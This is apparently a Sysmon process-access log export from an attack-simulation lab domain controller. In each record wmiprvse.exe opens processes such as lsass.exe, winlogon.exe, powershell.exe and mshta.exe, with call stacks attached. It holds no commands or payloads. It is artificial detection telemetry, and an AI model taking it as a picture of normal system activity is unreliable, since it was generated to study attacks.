16:00:16.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028767Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028766Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028765Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028764Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028763Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028762Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028761Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.552{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-538F-6008-8F06-00000000A301}2384C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028760Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.552{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-538F-6008-8E06-00000000A301}7020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028759Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.552{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-538F-6008-8D06-00000000A301}6164C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028758Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.552{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028757Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.552{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028756Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.552{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028755Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.552{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028754Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.552{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028753Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.552{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028752Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.552{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028751Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.552{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028750Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.552{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028749Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.552{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028748Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 